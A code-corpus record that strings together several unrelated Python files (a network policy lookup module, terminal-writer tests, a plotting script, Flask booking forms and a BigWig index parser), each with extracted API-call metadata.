                if i.uid not in self.graph[r]:
                    self.graph[r].append(i.uid)
    def import_json(self, slim, uid=None):
        """
        Import JSON formatted CIB entries into current cib.

        Accepts a single object or a list of objects; each entry is
        sanity-checked as a CIBNode, persisted to cib_dir, and then the
        directory is reloaded.
        """
        # TODO optimize
        try:
            json_slim = json.loads(slim)
        except json.decoder.JSONDecodeError:
            logging.warning('invalid CIB file format')
            return
        # check if we received multiple objects in a list
        if isinstance(json_slim, list):
            for c in json_slim:
                self.import_json(json.dumps(c))
            return
        # convert to CIB node object to do sanity check
        try:
            cs = CIBNode(json_slim)
        except CIBEntryError as e:
            print(e)
            return
        # do not import cache nodes if disabled
        if not PM.CIB_CACHE and any(['__cached' in p for p in cs.properties.expand()]):
            logging.debug('Ignoring cache CIB node')
            return
        if uid is not None:
            cs.uid = uid
        filename = cs.uid
        slim = cs.json()
        if not filename:
            logging.warning("CIB entry has no UID")
            # generate CIB filename
            filename = hashlib.md5(slim.encode('utf-8')).hexdigest()
        filename = '%s.cib' % filename.lower()
        with open(os.path.join(self.cib_dir, '%s' % filename), 'w') as f:
            f.write(slim)
        logging.debug("CIB entry saved as \"%s\"." % filename)
        self.reload_files()
    def register(self, cib_node):
        """Insert *cib_node* into the node table, replacing any node with the same uid."""
        # Fix: was `if cib_node in self.nodes` -- the dict is keyed by uid,
        # so the membership test compared a node object against uid keys and
        # the overwrite warning could never fire.
        if cib_node.uid in self.nodes:
            logging.debug("overwriting existing CIB with uid %s" % cib_node.uid)
        self.nodes[cib_node.uid] = cib_node
    def unregister(self, cib_uid):
        del self.nodes[cib_uid]
        self.update_graph()
    def remove(self, cib_uid):
        self.unregister(cib_uid)
    def lookup(self, input_properties, candidate_num=5):
        """CIB lookup logic implementation.

        Return up to *candidate_num* CIB rows (merged with the request and
        sorted by score) that include *all* immutable properties from the
        request PropertyArray; the bare request itself is always a candidate.
        """
        assert isinstance(input_properties, PropertyArray)
        candidates = [input_properties]
        for e in self.rows:
            try:
                # FIXME better check whether all input properties are included in row - improve matching
                # ignore optional properties in input request
                required_pa = PropertyArray(
                    *(p for p in input_properties.values() if p.precedence == NEATProperty.IMMUTABLE))
                if len(required_pa & e) != len(required_pa):
                    continue
            except ImmutablePropertyError:
                continue
            try:
                candidate = e + input_properties
                candidate.cib_node = e.cib_node
                candidates.append(candidate)
            except ImmutablePropertyError:
                # Row conflicts with an immutable request property: skip it.
                pass
        return sorted(candidates, key=operator.attrgetter('score'), reverse=True)[:candidate_num]
    def dump(self, show_all=False):
        """Print every expanded CIB row between START/END separators."""
        print(term_separator("CIB START"))
        for i, e in enumerate(self.rows):
            print("%3i. %s" % (i, str(e)))
        print(term_separator("CIB END"))
    def __repr__(self):
        return 'CIB<%d>' % (len(self.nodes))
if __name__ == "__main__":
    # Interactive smoke test: load the example CIB directory, dump its rows,
    # drop into a REPL, then run a sample lookup.
    cib = CIB('./cib/example/')
    b = cib['B']
    c = cib['C']
    cib.dump()
    import code
    code.interact(local=locals(), banner='CIB')
    for uid in cib.roots:
        z = cib[uid].resolve_links([])
        print(z)
    # Build a request PropertyArray from a hard-coded JSON request string.
    query = PropertyArray()
    test_request_str = '{"MTU": {"value": [1500, Infinity]}, "low_latency": {"precedence": 2, "value": true}, "remote_ip": {"precedence": 2, "value": "10:54:1.23"}, "transport": {"value": "TCP"}}'
    test = json.loads(test_request_str)
    for k, v in test.items():
        query.add(NEATProperty((k, v['value']), precedence=v.get('precedence', 1)))
    candidates = cib.lookup(query)
    for i in candidates:
        print(i)
        # print(i, i.cib_node, i.score)
| [
"operator.attrgetter",
"json.loads",
"copy.deepcopy",
"policy.term_separator",
"json.dumps",
"itertools.product",
"collections.ChainMap",
"policy.PropertyArray.from_dict",
"policy.PropertyMultiArray",
"bisect.bisect",
"policy.NEATProperty",
"time.time",
"json.load",
"policy.PropertyArray"
... | [((16694, 16709), 'policy.PropertyArray', 'PropertyArray', ([], {}), '()\n', (16707, 16709), False, 'from policy import NEATProperty, PropertyArray, PropertyMultiArray, ImmutablePropertyError, term_separator\n'), ((16918, 16946), 'json.loads', 'json.loads', (['test_request_str'], {}), '(test_request_str)\n', (16928, 16946), False, 'import json\n'), ((481, 500), 'json.load', 'json.load', (['cib_file'], {}), '(cib_file)\n', (490, 500), False, 'import json\n'), ((1740, 1760), 'policy.PropertyMultiArray', 'PropertyMultiArray', ([], {}), '()\n', (1758, 1760), False, 'from policy import NEATProperty, PropertyArray, PropertyMultiArray, ImmutablePropertyError, term_separator\n'), ((3703, 3742), 'json.dumps', 'json.dumps', (['d'], {'indent': '(0)', 'sort_keys': '(True)'}), '(d, indent=0, sort_keys=True)\n', (3713, 3742), False, 'import json\n'), ((4246, 4316), 'bisect.bisect', 'bisect.bisect', (['[self.cib[uid].priority for uid in path]', 'self.priority'], {}), '([self.cib[uid].priority for uid in path], self.priority)\n', (4259, 4316), False, 'import bisect\n'), ((6415, 6485), 'bisect.bisect', 'bisect.bisect', (['[self.cib[uid].priority for uid in path]', 'self.priority'], {}), '([self.cib[uid].priority for uid in path], self.priority)\n', (6428, 6485), False, 'import bisect\n'), ((7174, 7213), 'itertools.product', 'itertools.product', (['*expanded_properties'], {}), '(*expanded_properties)\n', (7191, 7213), False, 'import itertools\n'), ((13211, 13227), 'json.loads', 'json.loads', (['slim'], {}), '(slim)\n', (13221, 13227), False, 'import json\n'), ((16023, 16050), 'policy.term_separator', 'term_separator', (['"""CIB START"""'], {}), "('CIB START')\n", (16037, 16050), False, 'from policy import NEATProperty, PropertyArray, PropertyMultiArray, ImmutablePropertyError, term_separator\n'), ((16325, 16350), 'policy.term_separator', 'term_separator', (['"""CIB END"""'], {}), "('CIB END')\n", (16339, 16350), False, 'from policy import NEATProperty, PropertyArray, 
PropertyMultiArray, ImmutablePropertyError, term_separator\n'), ((2184, 2210), 'policy.PropertyArray.from_dict', 'PropertyArray.from_dict', (['l'], {}), '(l)\n', (2207, 2210), False, 'from policy import NEATProperty, PropertyArray, PropertyMultiArray, ImmutablePropertyError, term_separator\n'), ((3132, 3143), 'time.time', 'time.time', ([], {}), '()\n', (3141, 3143), False, 'import time\n'), ((3316, 3327), 'time.time', 'time.time', ([], {}), '()\n', (3325, 3327), False, 'import time\n'), ((7239, 7253), 'collections.ChainMap', 'ChainMap', (['*pas'], {}), '(*pas)\n', (7247, 7253), False, 'from collections import ChainMap\n'), ((1959, 1985), 'policy.PropertyArray.from_dict', 'PropertyArray.from_dict', (['p'], {}), '(p)\n', (1982, 1985), False, 'from policy import NEATProperty, PropertyArray, PropertyMultiArray, ImmutablePropertyError, term_separator\n'), ((13511, 13524), 'json.dumps', 'json.dumps', (['c'], {}), '(c)\n', (13521, 13524), False, 'import json\n'), ((15912, 15940), 'operator.attrgetter', 'operator.attrgetter', (['"""score"""'], {}), "('score')\n", (15931, 15940), False, 'import operator\n'), ((1863, 1890), 'policy.PropertyArray.from_dict', 'PropertyArray.from_dict', (['ps'], {}), '(ps)\n', (1886, 1890), False, 'from policy import NEATProperty, PropertyArray, PropertyMultiArray, ImmutablePropertyError, term_separator\n'), ((8361, 8381), 'copy.deepcopy', 'copy.deepcopy', (['entry'], {}), '(entry)\n', (8374, 8381), False, 'import copy\n'), ((8414, 8438), 'collections.ChainMap', 'ChainMap', (['pa', 'entry_copy'], {}), '(pa, entry_copy)\n', (8422, 8438), False, 'from collections import ChainMap\n'), ((5624, 5655), 'policy.NEATProperty', 'NEATProperty', (["('uid', node.uid)"], {}), "(('uid', node.uid))\n", (5636, 5655), False, 'from policy import NEATProperty, PropertyArray, PropertyMultiArray, ImmutablePropertyError, term_separator\n')] |
import py
import os, sys
from py.__.io import terminalwriter
def skip_win32():
if sys.platform == 'win32':
py.test.skip('Not relevant on win32')
def test_terminalwriter_computes_width():
py.magic.patch(terminalwriter, 'get_terminal_width', lambda: 42)
try:
tw = py.io.TerminalWriter()
assert tw.fullwidth == 42
finally:
py.magic.revert(terminalwriter, 'get_terminal_width')
def test_terminalwriter_defaultwidth_80():
py.magic.patch(terminalwriter, '_getdimensions', lambda: 0/0)
try:
tw = py.io.TerminalWriter()
assert tw.fullwidth == int(os.environ.get('COLUMNS', 80)) -1
finally:
py.magic.revert(terminalwriter, '_getdimensions')
def test_terminalwriter_default_instantiation():
tw = py.io.TerminalWriter(stringio=True)
assert hasattr(tw, 'stringio')
class BaseTests:
def test_line(self):
tw = self.getwriter()
tw.line("hello")
l = self.getlines()
assert len(l) == 1
assert l[0] == "hello\n"
def test_sep_no_title(self):
tw = self.getwriter()
tw.sep("-", fullwidth=60)
l = self.getlines()
assert len(l) == 1
assert l[0] == "-" * 60 + "\n"
def test_sep_with_title(self):
tw = self.getwriter()
tw.sep("-", "hello", fullwidth=60)
l = self.getlines()
assert len(l) == 1
assert l[0] == "-" * 26 + " hello " + "-" * 27 + "\n"
def test__escaped(self):
skip_win32()
tw = self.getwriter()
text2 = tw._escaped("hello", (31))
assert text2.find("hello") != -1
def test_markup(self):
skip_win32()
tw = self.getwriter()
for bold in (True, False):
for color in ("red", "green"):
text2 = tw.markup("hello", **{color: True, 'bold': bold})
assert text2.find("hello") != -1
py.test.raises(ValueError, "tw.markup('x', wronkw=3)")
py.test.raises(ValueError, "tw.markup('x', wronkw=0)")
def test_line_write_markup(self):
tw = self.getwriter()
tw.hasmarkup = True
tw.line("x", bold=True)
tw.write("x\n", red=True)
l = self.getlines()
skip_win32()
assert len(l[0]) > 2, l
assert len(l[1]) > 2, l
def test_attr_fullwidth(self):
tw = self.getwriter()
tw.sep("-", "hello", fullwidth=70)
tw.fullwidth = 70
tw.sep("-", "hello")
l = self.getlines()
assert len(l[0]) == len(l[1])
class TestStringIO(BaseTests):
def getwriter(self):
self.tw = py.io.TerminalWriter(stringio=True)
return self.tw
def getlines(self):
io = self.tw.stringio
io.seek(0)
return io.readlines()
class TestCallableFile(BaseTests):
def getwriter(self):
self.writes = []
return py.io.TerminalWriter(self.writes.append)
def getlines(self):
io = py.std.cStringIO.StringIO()
io.write("".join(self.writes))
io.seek(0)
return io.readlines()
def test_attr_hasmarkup():
tw = py.io.TerminalWriter(stringio=True)
assert not tw.hasmarkup
tw.hasmarkup = True
tw.line("hello", bold=True)
s = tw.stringio.getvalue()
assert len(s) > len("hello")
| [
"py.std.cStringIO.StringIO",
"py.test.raises",
"os.environ.get",
"py.magic.revert",
"py.magic.patch",
"py.io.TerminalWriter",
"py.test.skip"
] | [((206, 271), 'py.magic.patch', 'py.magic.patch', (['terminalwriter', '"""get_terminal_width"""', '(lambda : 42)'], {}), "(terminalwriter, 'get_terminal_width', lambda : 42)\n", (220, 271), False, 'import py\n'), ((484, 548), 'py.magic.patch', 'py.magic.patch', (['terminalwriter', '"""_getdimensions"""', '(lambda : 0 / 0)'], {}), "(terminalwriter, '_getdimensions', lambda : 0 / 0)\n", (498, 548), False, 'import py\n'), ((814, 849), 'py.io.TerminalWriter', 'py.io.TerminalWriter', ([], {'stringio': '(True)'}), '(stringio=True)\n', (834, 849), False, 'import py\n'), ((3146, 3181), 'py.io.TerminalWriter', 'py.io.TerminalWriter', ([], {'stringio': '(True)'}), '(stringio=True)\n', (3166, 3181), False, 'import py\n'), ((121, 158), 'py.test.skip', 'py.test.skip', (['"""Not relevant on win32"""'], {}), "('Not relevant on win32')\n", (133, 158), False, 'import py\n'), ((293, 315), 'py.io.TerminalWriter', 'py.io.TerminalWriter', ([], {}), '()\n', (313, 315), False, 'import py\n'), ((382, 435), 'py.magic.revert', 'py.magic.revert', (['terminalwriter', '"""get_terminal_width"""'], {}), "(terminalwriter, 'get_terminal_width')\n", (397, 435), False, 'import py\n'), ((568, 590), 'py.io.TerminalWriter', 'py.io.TerminalWriter', ([], {}), '()\n', (588, 590), False, 'import py\n'), ((692, 741), 'py.magic.revert', 'py.magic.revert', (['terminalwriter', '"""_getdimensions"""'], {}), "(terminalwriter, '_getdimensions')\n", (707, 741), False, 'import py\n'), ((1948, 2002), 'py.test.raises', 'py.test.raises', (['ValueError', '"""tw.markup(\'x\', wronkw=3)"""'], {}), '(ValueError, "tw.markup(\'x\', wronkw=3)")\n', (1962, 2002), False, 'import py\n'), ((2011, 2065), 'py.test.raises', 'py.test.raises', (['ValueError', '"""tw.markup(\'x\', wronkw=0)"""'], {}), '(ValueError, "tw.markup(\'x\', wronkw=0)")\n', (2025, 2065), False, 'import py\n'), ((2647, 2682), 'py.io.TerminalWriter', 'py.io.TerminalWriter', ([], {'stringio': '(True)'}), '(stringio=True)\n', (2667, 2682), False, 'import 
py\n'), ((2914, 2954), 'py.io.TerminalWriter', 'py.io.TerminalWriter', (['self.writes.append'], {}), '(self.writes.append)\n', (2934, 2954), False, 'import py\n'), ((2993, 3020), 'py.std.cStringIO.StringIO', 'py.std.cStringIO.StringIO', ([], {}), '()\n', (3018, 3020), False, 'import py\n'), ((628, 657), 'os.environ.get', 'os.environ.get', (['"""COLUMNS"""', '(80)'], {}), "('COLUMNS', 80)\n", (642, 657), False, 'import os, sys\n')] |
#!/usr/bin/python3
from sys import argv, stdin
from matplotlib import pyplot as plt
def main( argc, argv ):
exec, coords, x, y, radius = argv
x, y, radius = float( x ), float( y ), float( radius )
stdin = open( coords, 'r' )
X = []
Y = []
for line in stdin.readlines():
x, y = map( lambda v: float( v ), line.split( ', ', 2 ) )
X.append( x )
Y.append( y )
fig, ax = plt.subplots()
plt.plot( [ x ], [ y ], 'ro' )
circ = plt.Circle( ( x, y ), radius, color='r', fill=False )
ax.add_patch( circ )
plt.plot( X, Y, 'bo' )
plt.show()
if __name__ == '__main__':
try:
main( len( argv ), argv )
except KeyboardInterrupt:
print( 'successfully interrupted...' ) | [
"matplotlib.pyplot.Circle",
"matplotlib.pyplot.plot",
"sys.stdin.readlines",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.show"
] | [((264, 281), 'sys.stdin.readlines', 'stdin.readlines', ([], {}), '()\n', (279, 281), False, 'from sys import argv, stdin\n'), ((399, 413), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (411, 413), True, 'from matplotlib import pyplot as plt\n'), ((416, 440), 'matplotlib.pyplot.plot', 'plt.plot', (['[x]', '[y]', '"""ro"""'], {}), "([x], [y], 'ro')\n", (424, 440), True, 'from matplotlib import pyplot as plt\n'), ((456, 505), 'matplotlib.pyplot.Circle', 'plt.Circle', (['(x, y)', 'radius'], {'color': '"""r"""', 'fill': '(False)'}), "((x, y), radius, color='r', fill=False)\n", (466, 505), True, 'from matplotlib import pyplot as plt\n'), ((535, 555), 'matplotlib.pyplot.plot', 'plt.plot', (['X', 'Y', '"""bo"""'], {}), "(X, Y, 'bo')\n", (543, 555), True, 'from matplotlib import pyplot as plt\n'), ((560, 570), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (568, 570), True, 'from matplotlib import pyplot as plt\n')] |
# -*- coding: utf-8 -*-
__author__ = 'fyabc'
from flask.ext.wtf import Form
from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField
from wtforms.validators import DataRequired, NumberRange, Length
# Local modules.
from config import TableNames
class SignInForm(Form):
userID = StringField('用户ID', validators=[DataRequired()])
userName = StringField('用户名', validators=[DataRequired()])
password = PasswordField(
'密码', validators=[DataRequired(), Length(min=6, message='密码长度不得少于6个字符。')])
submit = SubmitField('注册')
class QueryForm(Form):
type = SelectField('查询类型', coerce=str, choices=TableNames)
queryName = StringField('查询主键名称', default='')
submit = SubmitField('查询')
class LoginForm(Form):
userName = StringField('账号', validators=[DataRequired()])
password = PasswordField('密码', validators=[DataRequired()])
submit = SubmitField('登录')
myUserName = 'fyabc'
myPassword = '<PASSWORD>'
class ReserveForm(Form):
customerID = StringField('用户编号', validators=[DataRequired()])
reserveType = SelectField('预订类型', coerce=int,
choices=[
(1, '航班'),
(2, '宾馆'),
(3, '出租车')
])
reserveKey = StringField('预订名称', validators=[DataRequired()])
submit = SubmitField('预订')
class UnsubscribeForm(Form):
reservationID = IntegerField('预订编号', validators=[DataRequired()])
submit = SubmitField('退订')
class InsertForm(Form):
type = SelectField('插入类型', coerce=str, choices=[name for name in TableNames if name[0] != 'Reservations'])
primaryKey = StringField('主键名称', validators=[DataRequired()])
price = IntegerField('价格', validators=[NumberRange(min=1, max=524287)])
numTotal = IntegerField('数量', validators=[NumberRange(min=1, max=1023)])
password = StringField('密码')
fromCity = StringField('出发城市')
toCity = StringField('目的城市')
customerName = StringField('用户名称')
submit = SubmitField('插入记录')
class DeleteForm(Form):
type = SelectField('删除类型', coerce=str, choices=[name for name in TableNames])
primaryKey = StringField('主键名称', validators=[DataRequired()])
submit = SubmitField('删除记录')
class RouteQueryForm(Form):
fromCity = StringField('出发城市', validators=[DataRequired()])
toCity = StringField('目的城市', validators=[DataRequired()])
submit = SubmitField('查询线路')
class CustomerQueryForm(Form):
IDNumber = StringField('用户ID')
customerName = StringField('用户名称')
submit = SubmitField('查询用户')
| [
"wtforms.validators.NumberRange",
"wtforms.SubmitField",
"wtforms.StringField",
"wtforms.validators.Length",
"wtforms.SelectField",
"wtforms.validators.DataRequired"
] | [((555, 572), 'wtforms.SubmitField', 'SubmitField', (['"""注册"""'], {}), "('注册')\n", (566, 572), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((609, 660), 'wtforms.SelectField', 'SelectField', (['"""查询类型"""'], {'coerce': 'str', 'choices': 'TableNames'}), "('查询类型', coerce=str, choices=TableNames)\n", (620, 660), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((677, 710), 'wtforms.StringField', 'StringField', (['"""查询主键名称"""'], {'default': '""""""'}), "('查询主键名称', default='')\n", (688, 710), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((724, 741), 'wtforms.SubmitField', 'SubmitField', (['"""查询"""'], {}), "('查询')\n", (735, 741), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((906, 923), 'wtforms.SubmitField', 'SubmitField', (['"""登录"""'], {}), "('登录')\n", (917, 923), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((1091, 1166), 'wtforms.SelectField', 'SelectField', (['"""预订类型"""'], {'coerce': 'int', 'choices': "[(1, '航班'), (2, '宾馆'), (3, '出租车')]"}), "('预订类型', coerce=int, choices=[(1, '航班'), (2, '宾馆'), (3, '出租车')])\n", (1102, 1166), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((1410, 1427), 'wtforms.SubmitField', 'SubmitField', (['"""预订"""'], {}), "('预订')\n", (1421, 1427), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((1542, 1559), 'wtforms.SubmitField', 'SubmitField', (['"""退订"""'], {}), "('退订')\n", (1553, 1559), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((1597, 1701), 'wtforms.SelectField', 'SelectField', (['"""插入类型"""'], {'coerce': 'str', 'choices': "[name for name in TableNames if name[0] != 'Reservations']"}), "('插入类型', 
coerce=str, choices=[name for name in TableNames if \n name[0] != 'Reservations'])\n", (1608, 1701), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((1931, 1948), 'wtforms.StringField', 'StringField', (['"""密码"""'], {}), "('密码')\n", (1942, 1948), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((1964, 1983), 'wtforms.StringField', 'StringField', (['"""出发城市"""'], {}), "('出发城市')\n", (1975, 1983), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((1997, 2016), 'wtforms.StringField', 'StringField', (['"""目的城市"""'], {}), "('目的城市')\n", (2008, 2016), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((2036, 2055), 'wtforms.StringField', 'StringField', (['"""用户名称"""'], {}), "('用户名称')\n", (2047, 2055), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((2069, 2088), 'wtforms.SubmitField', 'SubmitField', (['"""插入记录"""'], {}), "('插入记录')\n", (2080, 2088), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((2126, 2196), 'wtforms.SelectField', 'SelectField', (['"""删除类型"""'], {'coerce': 'str', 'choices': '[name for name in TableNames]'}), "('删除类型', coerce=str, choices=[name for name in TableNames])\n", (2137, 2196), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((2276, 2295), 'wtforms.SubmitField', 'SubmitField', (['"""删除记录"""'], {}), "('删除记录')\n", (2287, 2295), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((2465, 2484), 'wtforms.SubmitField', 'SubmitField', (['"""查询线路"""'], {}), "('查询线路')\n", (2476, 2484), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((2533, 2552), 'wtforms.StringField', 'StringField', 
(['"""用户ID"""'], {}), "('用户ID')\n", (2544, 2552), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((2572, 2591), 'wtforms.StringField', 'StringField', (['"""用户名称"""'], {}), "('用户名称')\n", (2583, 2591), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((2605, 2624), 'wtforms.SubmitField', 'SubmitField', (['"""查询用户"""'], {}), "('查询用户')\n", (2616, 2624), False, 'from wtforms import StringField, SubmitField, SelectField, PasswordField, IntegerField\n'), ((353, 367), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (365, 367), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((418, 432), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (430, 432), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((489, 503), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (501, 503), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((505, 543), 'wtforms.validators.Length', 'Length', ([], {'min': '(6)', 'message': '"""密码长度不得少于6个字符。"""'}), "(min=6, message='密码长度不得少于6个字符。')\n", (511, 543), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((816, 830), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (828, 830), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((880, 894), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (892, 894), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((1064, 1078), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (1076, 1078), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((1388, 1402), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (1400, 1402), False, 'from wtforms.validators import DataRequired, NumberRange, 
Length\n'), ((1520, 1534), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (1532, 1534), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((1754, 1768), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (1766, 1768), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((1810, 1840), 'wtforms.validators.NumberRange', 'NumberRange', ([], {'min': '(1)', 'max': '(524287)'}), '(min=1, max=524287)\n', (1821, 1840), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((1889, 1917), 'wtforms.validators.NumberRange', 'NumberRange', ([], {'min': '(1)', 'max': '(1023)'}), '(min=1, max=1023)\n', (1900, 1917), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((2254, 2268), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (2266, 2268), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((2381, 2395), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (2393, 2395), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n'), ((2443, 2457), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (2455, 2457), False, 'from wtforms.validators import DataRequired, NumberRange, Length\n')] |
import htmllistparse as ftp
from epivizfileserver.parser import BigWig
from joblib import Parallel, delayed
import struct
import pandas
import json
import pickle
url = "https://egg2.wustl.edu/roadmap/data/byFileType/signal/consolidated/macs2signal/foldChange/"
cwd, files = ftp.fetch_listing(url)
print("total files - ", len(files))
def get_file_index(file, baseurl):
print("processing file - ", file.name)
bw = BigWig(baseurl + file.name)
print("\t getting zoom headers")
bw.getZoomHeader()
print("\t get tree for full data offset")
tree = bw.getTree(-2)
bw.getId("chr1")
ofile = open("objects/" + file.name + ".pickle", 'wb')
pickle.dump(bw, ofile)
# ifile = "trees/" + file.name + ".fulltreeindex"
# print("\t writing index ", ifile)
# with open(ifile, "wb") as f:
# f.write(tree)
# This will download the index from all the files
Parallel(n_jobs = 10) (delayed(get_file_index)(file, url) for file in files)
def traverse_nodes(node, zoomlvl = -2, tree = None, result = [], fullIndexOffset = None, endian="="):
offset = node.get("rOffset")
if node.get("rIsLeaf"):
for i in range(0, node.get("rCount")):
data = tree[offset + (i * 32) : offset + ( (i+1) * 32 )]
(rStartChromIx, rStartBase, rEndChromIx, rEndBase, rdataOffset, rDataSize) = struct.unpack(endian + "IIIIQQ", data)
result.append((rStartChromIx, rStartBase, rEndChromIx, rEndBase, rdataOffset, rDataSize))
else:
for i in range(0, node.get("rCount")):
data = tree[offset + (i * 24) : offset + ( (i+1) * 24 )]
(rStartChromIx, rStartBase, rEndChromIx, rEndBase, rdataOffset) = struct.unpack(endian + "IIIIQ", data)
# remove index offset since the stored binary starts from 0
diffOffset = fullIndexOffset
childNode = read_node(tree, rdataOffset - diffOffset, endian)
traverse_nodes(childNode, zoomlvl, result=result, tree = tree,
fullIndexOffset = fullIndexOffset, endian = endian)
return result
def read_node(tree, offset, endian="="):
data = tree[offset:offset + 4]
(rIsLeaf, rReserved, rCount) = struct.unpack(endian + "BBH", data)
return {"rIsLeaf": rIsLeaf, "rCount": rCount, "rOffset": offset + 4}
def traverse_tree(file, baseurl):
print("processing file - ", file.name)
bw = BigWig(baseurl + file.name)
print("\t getting headers")
findexOffset = bw.header.get("fullIndexOffset")
# bw.getZoomHeader()
ifile = "trees/" + file.name + ".fulltreeindex"
f = open(ifile, "rb")
# bw.tree[str(-2)] = f.read()
tree = f.read()
f.close()
# print(tree)
offset = 48
print("\t endian - ", bw.endian)
print("\t fullindexoffset - ", findexOffset)
root = read_node(tree, offset, endian = bw.endian)
# print("\t root - ", root)
records = traverse_nodes(root, -2, tree = tree, fullIndexOffset = findexOffset, endian = bw.endian)
pfile = "processed/" + file.name + ".leaves"
df = pandas.DataFrame(records, columns=["rStartChromIx", "rStartBase", "rEndChromIx", "rEndBase",
"rdataOffset", "rDataSize"])
df.to_csv(pfile, index=False)
# This will extract the leaf nodes from all the files
# Parallel(n_jobs = 10) (delayed(traverse_tree)(file, url) for file in files[1000:])
def get_file_chr(file, baseurl):
# print("processing file - ", file.name)
bw = BigWig(baseurl + file.name)
# print("\t getting zoom headers")
bw.getZoomHeader()
bw.getId("chr1")
# print("\t chrom tree")
return bw.chrmIds
# Parallel(n_jobs = 10) (delayed(get_file_chr)(file, url) for file in files)
# result = {}
# for file in files:
# print("processing file - ", file.name)
# result[file.name] = get_file_chr(file, url)
# with open("chrmids.json", "w") as f:
# f.write(json.dumps(result))
# def build_quadtree(file, baseurl, chrmid):
| [
"pickle.dump",
"epivizfileserver.parser.BigWig",
"htmllistparse.fetch_listing",
"joblib.Parallel",
"struct.unpack",
"pandas.DataFrame",
"joblib.delayed"
] | [((275, 297), 'htmllistparse.fetch_listing', 'ftp.fetch_listing', (['url'], {}), '(url)\n', (292, 297), True, 'import htmllistparse as ftp\n'), ((423, 450), 'epivizfileserver.parser.BigWig', 'BigWig', (['(baseurl + file.name)'], {}), '(baseurl + file.name)\n', (429, 450), False, 'from epivizfileserver.parser import BigWig\n'), ((668, 690), 'pickle.dump', 'pickle.dump', (['bw', 'ofile'], {}), '(bw, ofile)\n', (679, 690), False, 'import pickle\n'), ((895, 914), 'joblib.Parallel', 'Parallel', ([], {'n_jobs': '(10)'}), '(n_jobs=10)\n', (903, 914), False, 'from joblib import Parallel, delayed\n'), ((2198, 2233), 'struct.unpack', 'struct.unpack', (["(endian + 'BBH')", 'data'], {}), "(endian + 'BBH', data)\n", (2211, 2233), False, 'import struct\n'), ((2394, 2421), 'epivizfileserver.parser.BigWig', 'BigWig', (['(baseurl + file.name)'], {}), '(baseurl + file.name)\n', (2400, 2421), False, 'from epivizfileserver.parser import BigWig\n'), ((3046, 3171), 'pandas.DataFrame', 'pandas.DataFrame', (['records'], {'columns': "['rStartChromIx', 'rStartBase', 'rEndChromIx', 'rEndBase', 'rdataOffset',\n 'rDataSize']"}), "(records, columns=['rStartChromIx', 'rStartBase',\n 'rEndChromIx', 'rEndBase', 'rdataOffset', 'rDataSize'])\n", (3062, 3171), False, 'import pandas\n'), ((3455, 3482), 'epivizfileserver.parser.BigWig', 'BigWig', (['(baseurl + file.name)'], {}), '(baseurl + file.name)\n', (3461, 3482), False, 'from epivizfileserver.parser import BigWig\n'), ((918, 941), 'joblib.delayed', 'delayed', (['get_file_index'], {}), '(get_file_index)\n', (925, 941), False, 'from joblib import Parallel, delayed\n'), ((1341, 1379), 'struct.unpack', 'struct.unpack', (["(endian + 'IIIIQQ')", 'data'], {}), "(endian + 'IIIIQQ', data)\n", (1354, 1379), False, 'import struct\n'), ((1686, 1723), 'struct.unpack', 'struct.unpack', (["(endian + 'IIIIQ')", 'data'], {}), "(endian + 'IIIIQ', data)\n", (1699, 1723), False, 'import struct\n')] |
from os import stat
from django.contrib.auth import get_user_model
